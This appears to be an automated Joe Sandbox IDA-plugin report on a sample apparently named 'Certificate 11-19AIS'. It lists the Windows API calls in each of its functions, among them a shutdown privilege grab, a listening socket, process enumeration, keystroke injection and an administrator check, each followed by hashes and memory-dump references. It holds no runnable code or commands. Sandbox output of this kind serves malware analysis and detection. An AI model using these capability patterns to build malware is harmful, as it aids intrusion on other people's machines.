                                                                              • Instruction Fuzzy Hash: CC911871D00218EBDB10DF94DC95EDEBBB9FF48710F10812AE515A7281EB746A45CFA0
                                                                              APIs
                                                                                • Part of subcall function 007EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                                                • Part of subcall function 007EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                                                • Part of subcall function 007EB134: GetLastError.KERNEL32 ref: 007EB1BA
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 007F7A0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-194228
                                                                              • Opcode ID: 671209a454b3eae9ce43f022be2a6ec768d8a84d495dea25e18f3cdd03192423
                                                                              • Instruction ID: 7dd424496a01bc103b46ba392988b8e3af6016d7cd78f42369ee2fda0e060b96
                                                                              • Opcode Fuzzy Hash: 671209a454b3eae9ce43f022be2a6ec768d8a84d495dea25e18f3cdd03192423
                                                                              • Instruction Fuzzy Hash: 6F01F771659319AAF72C567CDC5FFBF3258AB04750F268824FB13E22D2E9AD5E00C1A0
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00808CA8
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808CB7
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00808CD3
                                                                              • listen.WSOCK32(00000000,00000005), ref: 00808CE2
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808CFC
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00808D10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                              • String ID:
                                                                              • API String ID: 1279440585-0
                                                                              • Opcode ID: a4cb58cebd98d1a4e1b4d55312dc7256abf3f304aa3401f87b7e1b4b4f78fc81
                                                                              • Instruction ID: be7723ffb9eeb9ad6b887b61eaf395b1c7f24e2a72966310d83086f0c1bea2db
                                                                              • Opcode Fuzzy Hash: a4cb58cebd98d1a4e1b4d55312dc7256abf3f304aa3401f87b7e1b4b4f78fc81
                                                                              • Instruction Fuzzy Hash: 6C21D031600204EFCB60AF28DD49B6EB7A9FF48314F108558F956E73D2CB74AD418B61
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F6554
                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007F6564
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 007F6583
                                                                              • __wsplitpath.LIBCMT ref: 007F65A7
                                                                              • _wcscat.LIBCMT ref: 007F65BA
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007F65F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                              • String ID:
                                                                              • API String ID: 1605983538-0
                                                                              • Opcode ID: a9be11aa4aece8d2f58e9fcd767856517e914a3e43574ae2537887830257c9de
                                                                              • Instruction ID: e9971ac353388e80e530e5a56c04ed5212affa2adccdd4463a43774a9962dd6a
                                                                              • Opcode Fuzzy Hash: a9be11aa4aece8d2f58e9fcd767856517e914a3e43574ae2537887830257c9de
                                                                              • Instruction Fuzzy Hash: 0421877190021CEBDB10ABA4DD88FEDB7BCAB45300F5004A5F605E7241EB759F95CB60
                                                                              APIs
                                                                                • Part of subcall function 0080A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00809296
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 008092B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 4170576061-0
                                                                              • Opcode ID: 06422c42cf867723c500334ead9563d8cd3586206520b330d76fb1e7b3c99268
                                                                              • Instruction ID: f71ecc390c418bea2128311aa65ba1fea2618780379eeffc3029c61aedd01ae9
                                                                              • Opcode Fuzzy Hash: 06422c42cf867723c500334ead9563d8cd3586206520b330d76fb1e7b3c99268
                                                                              • Instruction Fuzzy Hash: 42418C70600204AFDB14AB688C4AF7EB7E9EF44724F14445CFA56EB2D2DA789D018B91
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007FEB8A
                                                                              • _wcscmp.LIBCMT ref: 007FEBBA
                                                                              • _wcscmp.LIBCMT ref: 007FEBCF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 007FEBE0
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007FEC0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 2387731787-0
                                                                              • Opcode ID: 326519e106fbe944634f426f1dc3c7b12a11659903e6044711acb53abacbef7b
                                                                              • Instruction ID: efb8bd4a3d095d7bc49630a1105eb3165c09a19f85ab41b84099f4c20ab9ef99
                                                                              • Opcode Fuzzy Hash: 326519e106fbe944634f426f1dc3c7b12a11659903e6044711acb53abacbef7b
                                                                              • Instruction Fuzzy Hash: CC41BB35604306DFC718DF28C490EAAB7E5FF49320F10455EFA5A8B3A1DB39A940CBA1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 3de158d83e8109fac0bcbd32118887dd76a22fdd7d1bbd41cf6850516855ea62
                                                                              • Instruction ID: 2915c7030a7692783829f092d2789b89a3e63d6b57f7a973d76c535476fec2ff
                                                                              • Opcode Fuzzy Hash: 3de158d83e8109fac0bcbd32118887dd76a22fdd7d1bbd41cf6850516855ea62
                                                                              • Instruction Fuzzy Hash: 8E119332300215EBE7211F26EC46FAE779CFF94760B040819F845D7241CF34D98386A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                              • API String ID: 0-1546025612
                                                                              • Opcode ID: b7d4d61a0ecfc12281dd18e03736baf58143f0d619d12966aef2997e09ecafbe
                                                                              • Instruction ID: ac218a6233dcde0b73bc6fb867cc811ebb613fc7ea9b3af9cec11da7f6e52015
                                                                              • Opcode Fuzzy Hash: b7d4d61a0ecfc12281dd18e03736baf58143f0d619d12966aef2997e09ecafbe
                                                                              • Instruction Fuzzy Hash: 38926C71E0021ADBDF24DF58C8907EDB7B1FB94314F14819AEA16EB280E7789D81DB91
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,007CE014,756F0AE0,007CDEF1,0084DC38,?,?), ref: 007CE02C
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007CE03E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: fc393dc6add0a2798de8651423b94884b46bcca9738949b15b6c800d7dcefd1d
                                                                              • Instruction ID: 3d1cf6445ec601a5f25c9b9eb19e87e38ea534caa124357ad857f3d2458a57e2
                                                                              • Opcode Fuzzy Hash: fc393dc6add0a2798de8651423b94884b46bcca9738949b15b6c800d7dcefd1d
                                                                              • Instruction Fuzzy Hash: 5DD0C770500B129FD7315F65FC09B56B7D4FB44711F29886EE495D2250D7BCD8C08B90
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007F13DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: ($|
                                                                              • API String ID: 1659193697-1631851259
                                                                              • Opcode ID: d1c20f058a4878337f6550d33f471a43438a04d35e3f1d6158ac9be29abac2bc
                                                                              • Instruction ID: 3aab32f131236b6e393aed3df1d0799461838a94a958a8e056d5790216e42a0f
                                                                              • Opcode Fuzzy Hash: d1c20f058a4878337f6550d33f471a43438a04d35e3f1d6158ac9be29abac2bc
                                                                              • Instruction Fuzzy Hash: 09321375A00609DFC728CF69C480A6AB7F0FF88320B51C46EE59ADB3A1E774E941CB40
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 007CB22F
                                                                                • Part of subcall function 007CB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 007CB5A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Proc$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 2749884682-0
                                                                              • Opcode ID: 5c315f24ed2bb194e7c9290fad2e74843cbacee1103e24142d9ff1121a119e54
                                                                              • Instruction ID: 7fb6ec01547cbbc4b2888fb9259fca092b150a11e800d0fb1a9ff279bea94227
                                                                              • Opcode Fuzzy Hash: 5c315f24ed2bb194e7c9290fad2e74843cbacee1103e24142d9ff1121a119e54
                                                                              • Instruction Fuzzy Hash: 30A13360114119BAEB28AE2E6C8FFBF3B5CFB92344F14411DF906D6592DB2CDC809676
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008043BF,00000000), ref: 00804FA6
                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00804FD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                              • String ID:
                                                                              • API String ID: 599397726-0
                                                                              • Opcode ID: ee08fd79e038802c8bc317b1edb763dc2d3f60d6198b09c2ee261ce932d84386
                                                                              • Instruction ID: e6df62ef616ab1b5171759b5f94f256c20d96a7667d27aaf7ee01868b96a8f3c
                                                                              • Opcode Fuzzy Hash: ee08fd79e038802c8bc317b1edb763dc2d3f60d6198b09c2ee261ce932d84386
                                                                              • Instruction Fuzzy Hash: 4F4105B164460ABFEB609E94DC85EBF77BCFB40368F10502EF305E61C0DA719E419AA0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FE20D
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007FE267
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007FE2B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: 363a2ab3062db902eeac81601f38b60e6a75cba6828b8e365ffdf5839f7dca7e
                                                                              • Instruction ID: f9cf12d06929172e9ac606c5e8bb5a36864a4e85f19fa04ab94b69866bfa6985
                                                                              • Opcode Fuzzy Hash: 363a2ab3062db902eeac81601f38b60e6a75cba6828b8e365ffdf5839f7dca7e
                                                                              • Instruction Fuzzy Hash: 60213C75A00618EFCB00EFA5D885EAEFBB8FF88310F0484A9E905AB351DB359915CB50
                                                                              APIs
                                                                                • Part of subcall function 007CF4EA: std::exception::exception.LIBCMT ref: 007CF51E
                                                                                • Part of subcall function 007CF4EA: __CxxThrowException@8.LIBCMT ref: 007CF533
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                                              • GetLastError.KERNEL32 ref: 007EB1BA
                                                                              Similarity
                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1922334811-0
                                                                              • Opcode ID: 062636582dcd5e9c3158bba0837b580cae083ee96601f6ec1dbfaa767718f346
                                                                              • Instruction ID: 7caf8099709fdc5647ab59a4773156f300b8b0170bd5d998976b0b5d4992acde
                                                                              • Opcode Fuzzy Hash: 062636582dcd5e9c3158bba0837b580cae083ee96601f6ec1dbfaa767718f346
                                                                              • Instruction Fuzzy Hash: 2511C1B2504304AFE718AF65ECC5D6BBBBDFB44720B20892EF05693241EB74FC418A60
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007F6623
                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007F6664
                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007F666F
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 33631002-0
                                                                              • Opcode ID: 1349d2e01b76173df56c39456af7c8c4d045d95a5f2c81e060ad7cf4dfbb91bb
                                                                              • Instruction ID: 9454681bb97b3811bff9856c7978e8c8e54032e973b6efc98b2d2b954959ae79
                                                                              • Opcode Fuzzy Hash: 1349d2e01b76173df56c39456af7c8c4d045d95a5f2c81e060ad7cf4dfbb91bb
                                                                              • Instruction Fuzzy Hash: 5B110C71E01228BFDB108FA5AC45BAEBBBCEB45B10F104556F900E7290D6B45A059BA5
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007F7223
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007F723A
                                                                              • FreeSid.ADVAPI32(?), ref: 007F724A
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: 86beff065c1da20633473d5f12d9ac3e615be3debd99125bf2264a803665f766
                                                                              • Instruction ID: 36c6ea1de912a2d04f6c082e0d10ba91c949418275090b470aae8641a9a201ab
                                                                              • Opcode Fuzzy Hash: 86beff065c1da20633473d5f12d9ac3e615be3debd99125bf2264a803665f766
                                                                              • Instruction Fuzzy Hash: 88F01D76A14309BFDF04DFF4DD99AEEBBB8FF48601F504869A602E2191E2749A448B10
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007FF599
                                                                              • FindClose.KERNEL32(00000000), ref: 007FF5C9
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 47a56a0226729ca3f3bf6f99493b0260c41b6a0b24d2b9ee728e86e89a3a07ae
                                                                              • Instruction ID: 5115f6fdf14403aa520f2f94a539ede7ded4f50ddee07b74c7e213b6e7e24935
                                                                              • Opcode Fuzzy Hash: 47a56a0226729ca3f3bf6f99493b0260c41b6a0b24d2b9ee728e86e89a3a07ae
                                                                              • Instruction Fuzzy Hash: F81161726046049FD710EF28D849A2EF7E9FF84324F04891EF9A5DB391DF34A9118B95
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0080BE6A,?,?,00000000,?), ref: 007FCEA7
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0080BE6A,?,?,00000000,?), ref: 007FCEB9
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: 48b5e90e75d01feffe91ef3f942d433348fcedb362dbca8a2dae0fbb99446638
                                                                              • Instruction ID: 89c9d46bf71e8509cee358932cac9dd4c1e67b62583045c05d79f595d6d7b8d5
                                                                              • Opcode Fuzzy Hash: 48b5e90e75d01feffe91ef3f942d433348fcedb362dbca8a2dae0fbb99446638
                                                                              • Instruction Fuzzy Hash: EEF0823110032DEBDB11ABA4DC49FFA776DBF48351F008565F915D6281D634DA50CBA1
                                                                              APIs
                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007F4153
                                                                              • keybd_event.USER32(?,7608C0D0,?,00000000), ref: 007F4166
                                                                              Similarity
                                                                              • API ID: InputSendkeybd_event
                                                                              • String ID:
                                                                              • API String ID: 3536248340-0
                                                                              • Opcode ID: e575f749c044dfc0301c6c67b6459385446f7501fd46bd031b23a3c0875a9fe9
                                                                              • Instruction ID: 39d07aecf572016867848fc154fd5401b4e2c604c3777118d04457161d6ae3cd
                                                                              • Opcode Fuzzy Hash: e575f749c044dfc0301c6c67b6459385446f7501fd46bd031b23a3c0875a9fe9
                                                                              • Instruction Fuzzy Hash: 73F0677080034DAFDB058FA4C805BBEBBB0FF00305F00840AF966A6292D7B986129FA0
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007EACC0), ref: 007EAB99
                                                                              • CloseHandle.KERNEL32(?,?,007EACC0), ref: 007EABAB
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: 05e36900e6222f7684e2ca8e8d26cd11ef883a90bf29d864a06ccdd4ba81afb6
                                                                              • Instruction ID: 3adcfd84e6bd3f266f62f4af6fe5f481a698f35ba9b82cf382ba9d6e81ec5b8d
                                                                              • Opcode Fuzzy Hash: 05e36900e6222f7684e2ca8e8d26cd11ef883a90bf29d864a06ccdd4ba81afb6
                                                                              • Instruction Fuzzy Hash: 69E0E672004A10EFE7252F55FC09DB777EAEF44320710882DF55A81470D7666C90DB50
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,007D6DB3,-0000031A,?,?,00000001), ref: 007D81B1
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007D81BA
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 30285876036ae0664a0dc5ef1c851c90dcf65cf35bb3cdd158a29afc38fbe421
                                                                              • Instruction ID: 2d30e7f1fd6b7fb30778cadc99662ca2e3a231ecf645ff27b91e92e1fc403385
                                                                              • Opcode Fuzzy Hash: 30285876036ae0664a0dc5ef1c851c90dcf65cf35bb3cdd158a29afc38fbe421
                                                                              • Instruction Fuzzy Hash: E3B09231044708ABDB002BA1FC09B987F68FB88656F008410F60D49261AB7258208A92
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: afc4287bcc921d7daa7307c48bc1fb3fb94766412711c96ea49813579fba0c6d
                                                                              • Instruction ID: c79d593665abca1966c58ef68b0b4cf9ca02a5764367ee1d76d54054e71429a0
                                                                              • Opcode Fuzzy Hash: afc4287bcc921d7daa7307c48bc1fb3fb94766412711c96ea49813579fba0c6d
                                                                              • Instruction Fuzzy Hash: 55A21774A04219CFDB28CF58C4947EDBBB1FF88314F2581A9E859AB391D7349A81DF90
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 534fd45e0a6c3da671503193347a7052ac362a034ab039535836067bd3c8700a
                                                                              • Instruction ID: 699ff14e8636027b739f49964039d36debacbc6d37045d5f66d44546ffca5ada
                                                                              • Opcode Fuzzy Hash: 534fd45e0a6c3da671503193347a7052ac362a034ab039535836067bd3c8700a
                                                                              • Instruction Fuzzy Hash: 59320321D69F014DD7239638D832336A2A8EFB73D4F55D737F819B5AA6EB29D8834100
                                                                              Similarity
                                                                              • API ID: __itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 674341424-0
                                                                              • Opcode ID: c07aec30712fae3268c1faabfb26cc5fe47eb2ccacd71654882126cedd324d9b
                                                                              • Instruction ID: 6e06c9cae48389ce00e384e6af814c9818fdf240df569e1c181551424fe285de
                                                                              • Opcode Fuzzy Hash: c07aec30712fae3268c1faabfb26cc5fe47eb2ccacd71654882126cedd324d9b
                                                                              • Instruction Fuzzy Hash: 772266715083119FD724DF14C894BAEB7E4FF84310F10892DFAAA9B291DB79E945CB82
                                                                              Memory Dump Source
